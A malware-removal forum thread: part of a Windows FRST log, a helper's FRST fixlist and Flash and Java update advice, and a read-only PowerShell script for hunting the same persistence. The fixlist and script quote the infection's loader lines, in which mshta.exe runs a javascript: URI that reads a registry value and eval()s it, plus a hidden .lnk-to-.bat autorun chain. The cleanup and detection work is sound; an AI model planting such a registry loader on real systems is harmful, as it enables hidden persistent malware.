Report Id: 1e77d167-ad6d-11e6-a646-001e8cf5a0bc

Error: (11/18/2016 03:27:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".


System errors:
=============
Error: (11/19/2016 04:11:41 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:51:04 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:39:06 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:37:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:33:31 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:15:09 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:10:14 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/19/2016 02:55:18 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 02:54:16 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 02:38:12 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.


CodeIntegrity:
===================================
  Date: 2016-11-01 13:28:46.075
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:46.012
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:45.950
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:45.887
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.508
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.446
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.399
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.337
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-09-18 10:50:59.242
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-09-18 10:50:59.210
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2320 CPU @ 3.00GHz
Percentage of memory in use: 43%
Total physical RAM: 8161.36 MB
Available physical RAM: 4612.8 MB
Total Virtual: 16320.89 MB
Available Virtual: 12915.57 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:392.05 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 158191E4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Edited by Chris Cosgrove, 19 November 2016 - 06:05 PM.
Moved from 'Am I infected?' to 'Virus, trojan, etc. logs'


#3 nasdaq

nasdaq

  • Malware Response Team
  • 38,576 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 20 November 2016 - 10:37 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:


HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13]
CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01]
S4 LMIRfsClientNP; no ImagePath
S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat ()
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION
C:\Users\cjerald\AppData\Local\322148

reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===


Your version(s) of Adobe Flash are out-of-date and vulnerable.
Go to Start > Control Panel > Programs and Features and uninstall the following programs:
XXXAdobe Flash Player 16 ActiveX
Adobe Flash Player 19 NPAPIXXX


Go to this page with Firefox to download the current version for your browser:
https://get.adobe.com/flashplayer/

Note:
Flash Player is pre-installed in Google Chrome and updates automatically!
Flash Player is pre-installed in IE/Edge and updates automatically!

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as a Java update!
Important: read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)

Please post the Fixlog.txt and let me know what problem persists.
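The fixlist above removes the chain that FRST and Malwarebytes both flagged: a Run value with an unprintable name that launches mshta.exe with a javascript: URI, a second Run value pointing at a .lnk under %LOCALAPPDATA%\322148 that in turn runs a .bat, and a per-user file class (d122cd) whose shell command is the same mshta loader. In all of them the script body is not on disk; it is read out of HKCU\software\auux\onnlw with RegRead and handed to eval(), which is why the file scanners found nothing to delete. The PowerShell below is an added example, not part of this thread and not FRST code, for confirming that pattern on a live host before or after the fix. Only the key, value and folder names quoted from the log are real; the function names, the %TEMP% output location and the use of WScript.Shell to resolve shortcuts are my assumptions, and nothing in it executes the recovered script.

```powershell
# Added example, not from the thread and not FRST code: a read-only hunt for the
# persistence chain in the log above (Run value -> %LOCALAPPDATA%\<digits>\*.lnk -> *.bat,
# plus a per-user file class whose shell command runs mshta.exe with a javascript: URI
# that RegReads a registry value and eval()s it). Names quoted from the log are real;
# every other name is an assumption. Run as the affected user (the artifacts live in HKCU).

# Loader shape seen in both the Run value and the d122cd shell command in the log.
$loaderPattern = 'mshta\.exe.*javascript:.*RegRead\("(?<path>[^"]+)"\).*eval\('

function Test-RunKeyLoaders {
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # provider metadata, not a Run value
            $data = [string]$prop.Value
            # FRST rendered the names as **pmrnby<*>: control characters in a value name are
            # an indicator on their own (regedit and msconfig cannot show or delete them).
            $badChars = @($prop.Name.ToCharArray() | Where-Object { [int]$_ -lt 0x20 -or [int]$_ -gt 0x7e }).Count
            if ($data -match $loaderPattern) {
                [pscustomobject]@{ Indicator = 'Run value launches mshta RegRead/eval loader'
                                   Location = "$key [$($prop.Name)]"; HiddenNameChars = $badChars
                                   Stage2RegPath = ($Matches['path'] -replace '\\\\', '\') }
            } elseif ($badChars -gt 0 -or $data -match '\\AppData\\Local\\\d+\\[0-9a-f]+\.lnk') {
                [pscustomobject]@{ Indicator = 'Run value with hidden name or LocalAppData .lnk'
                                   Location = "$key [$($prop.Name)]"; HiddenNameChars = $badChars
                                   Stage2RegPath = $null }
            }
        }
    }
}

function Test-ShellCommandLoaders {
    # The log's handler is HKCU\Software\Classes\d122cd: a random ProgID whose
    # shell\open\command is the same mshta loader. Walk every per-user class.
    $root = 'HKCU:\Software\Classes'
    foreach ($cls in (Get-ChildItem -Path $root -ErrorAction SilentlyContinue)) {
        $cmdKey = "$root\$($cls.PSChildName)\shell\open\command"
        if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
        $cmd = [string](Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue).'(default)'
        if ($cmd -match $loaderPattern) {
            [pscustomobject]@{ Indicator = 'File class shell command launches mshta loader'
                               Location = $cmdKey; HiddenNameChars = 0
                               Stage2RegPath = ($Matches['path'] -replace '\\\\', '\') }
        }
    }
}

function Test-LocalAppDataLnkBat {
    # Log chain: Run value -> %LOCALAPPDATA%\322148\4c5510.lnk -> 83934e.bat in the same
    # all-digits folder. Resolve .lnk targets through the shell object, never launch them.
    $wsh = New-Object -ComObject WScript.Shell
    foreach ($dir in (Get-ChildItem -Path $env:LOCALAPPDATA -Directory -ErrorAction SilentlyContinue |
                      Where-Object { $_.Name -match '^\d+$' })) {
        foreach ($lnk in (Get-ChildItem -Path $dir.FullName -Filter *.lnk -ErrorAction SilentlyContinue)) {
            $target = $wsh.CreateShortcut($lnk.FullName).TargetPath
            if ($target -match '\.bat$') {
                [pscustomobject]@{ Indicator = '.lnk in numeric LocalAppData folder runs a .bat'
                                   Location = "$($lnk.FullName) -> $target"; HiddenNameChars = 0
                                   Stage2RegPath = $null }
            }
        }
    }
}

function Export-Stage2Script {
    # Copy the value the loader RegReads (in the log: HKCU\software\auux\onnlw) to disk for
    # analysis. Nothing here runs it; eval() of that blob is exactly what the loader does.
    param([string]$RegPath, [string]$OutDir)
    $i = $RegPath.LastIndexOf('\')
    if ($i -lt 1) { return }
    $key  = $RegPath.Substring(0, $i) -replace '^(HKCU|HKEY_CURRENT_USER)\\', 'HKCU:\' -replace '^(HKLM|HKEY_LOCAL_MACHINE)\\', 'HKLM:\'
    $name = $RegPath.Substring($i + 1)
    $blob = [string](Get-ItemProperty -LiteralPath $key -Name $name -ErrorAction SilentlyContinue).$name
    if (-not $blob) { Write-Warning "stage-2 value $name not found under $key"; return }
    $out  = Join-Path $OutDir (($RegPath -replace '[\\:]', '_') + '.js.txt')
    Set-Content -LiteralPath $out -Value $blob -Encoding UTF8
    $sha  = [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes($blob))) -replace '-', ''
    [pscustomobject]@{ File = $out; Bytes = $blob.Length; SHA256 = $sha }
}

function Get-WmiEventBindings {
    # Addition.txt shows WinMgmt errors about a permanent __EventFilter polling Win32_Processor
    # load; list permanent filter-to-consumer bindings so the analyst can judge that filter.
    Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue |
        Select-Object Filter, Consumer
}

$findings = @(Test-RunKeyLoaders) + @(Test-ShellCommandLoaders) + @(Test-LocalAppDataLnkBat)
$findings | Format-Table -AutoSize -Wrap
$findings | Where-Object { $_.Stage2RegPath } | Select-Object -ExpandProperty Stage2RegPath -Unique |
    ForEach-Object { Export-Stage2Script -RegPath $_ -OutDir $env:TEMP }
Get-WmiEventBindings | Format-Table -AutoSize -Wrap
```

Two caveats when using it. It only sees the HKCU of the account it runs under, so on a shared machine run it as each user (or walk HKU:\<SID> for loaded hives) rather than once from an admin account. And a clean result from the Run keys alone proves little: the d122cd class and the auux\onnlw value are what keep the infection alive, so a "mshta.exe ... javascript:" string in any Run value or any Classes\*\shell\open\command is worth alerting on permanently, not just during this cleanup.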

#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,576 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 26 November 2016 - 09:52 AM

Are you still with me?
